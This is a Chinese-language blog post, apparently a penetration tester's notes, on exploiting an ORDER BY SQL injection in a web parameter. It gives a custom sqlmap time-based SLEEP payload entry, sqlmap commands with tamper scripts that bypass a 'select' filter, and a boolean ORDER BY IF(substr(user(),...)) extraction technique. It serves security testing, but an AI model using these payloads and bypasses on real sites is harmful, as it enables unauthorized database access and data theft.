---
title: Order By 注入
date: 2020-04-24
tags:
  - SQL
categories: SQL
---

测试的时候碰到了一个点

```
http://www.example.com/?orderby=id,name|desc
```
将 desc 改为 asc 会变成升序，删除 name|desc 无任何影响,修改 id 为 test
 无数据，改为 1 有数据出现，改为 0 再次没有数据，推测该处为 `order by` 注入 SQL 语句大概为
 ```sql
 select * from admin order by xxx;
 ```

 本地测试下当 order by 后为 0 时确实会出错
![image-20200424143321296](Order-By-注入/image-20200424143321296.png)

 接下来尝试下 sleep

 由于 order by 会把每条数据都代入后面的查询，所以有几条数据就会 sleep 的时间 * 数据条数
 ![image-20200424143354238](Order-By-注入/image-20200424143354238.png)
 我本地是有三条数据，所以延时了三秒
 ![image-20200424143429712](Order-By-注入/image-20200424143429712.png)
 而漏洞存在的点有一百多条数据，只能 sleep(0.01) 这样子，但是 sqlmap 的延时注入并不允许延时时间为小数
 ![image-20200424143450638](Order-By-注入/image-20200424143450638.png)
 就算是设置为 1s，在大量数据的加持下也会变成一百多秒，对此我选择修改了 sqlmap 的 payload 文件，在 data/xml/payloads/ 目录下的 time_bind.xml,在原有基础上增加了一条,并稍微修改了下 payload

 ```xml
     <!--self add start -->
    <test>
        <title>MySQL &gt;= 5.0.12 SELF ADD time-based blind (SLEEP)</title>
        <stype>5</stype>
        <level>1</level>
        <risk>1</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>(IF(([INFERENCE]),SLEEP(0.01),[RANDNUM]))</vector>
        <request>
            <payload>(SLEEP(0.01))</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&gt;= 5.0.12</dbms_version>
        </details>
    </test>
    <!--self add end -->
 ```
![image-20200424143528242](Order-By-注入/image-20200424143528242.png)

使用命令
```bash
 python sqlmap.py -r 1.xt --tamper=splitwithchar,space2comment -v 3 --dbms=mysql --technique T --time-sec 1
```
![image-20200424143643657](Order-By-注入/image-20200424143643657.png)
PS: 上述 tamper 中用到的 splitwithchar 脚本的作用是将 select 转变为 `Se%00lect` 因为漏洞点不能出现 select 而 %00 刚好会被替换为空

虽然上文已经可以通过 sqlmap 进行延时注入了，但是耗时实在过长而且有时候会出现意义不明的错误，为了更高效的进行注入，咱又研究了下 order by,在这篇文章中找到了一个思路
[MySQL ORDER BY IF() 条件排序](https://www.cnblogs.com/xiaoshen666/p/11004983.html)

前面也有说过，在 sleep 的时候是有多少条数据就会 sleep 多少次，也就是说每条数据都会经由 order by 后的数据进行排序，举个栗子，还是这三条数据
![image-20200424143429712](Order-By-注入/image-20200424143429712.png)
当我使用

```sql
select * from admin order by if(name="test",1,0) desc;
```
进行查询时
![image-20200424143727068](Order-By-注入/image-20200424143727068.png)
因为第二条数据的 name 为 test 所以其就被放在了最上面，这样子怎么注入也有方法了

```sql
SELECT * from admin order by if((name='test' and substr(user(),1,1)='a'),1,0) desc,name ;
```
只有满足 name 为 test 而且后面的查询条件为真时才可将第二条数据放在第一的位置
![image-20200424143751610](Order-By-注入/image-20200424143751610.png)
这样就可以直接交给 sqlmap 了
```bash
python sqlmap.py -u "http://www.example.com/?orderby=if((id=25+*),1,0)+desc" --tamper=splitwithchar,space2comment -v 3 --dbms=mysql --technique B
```
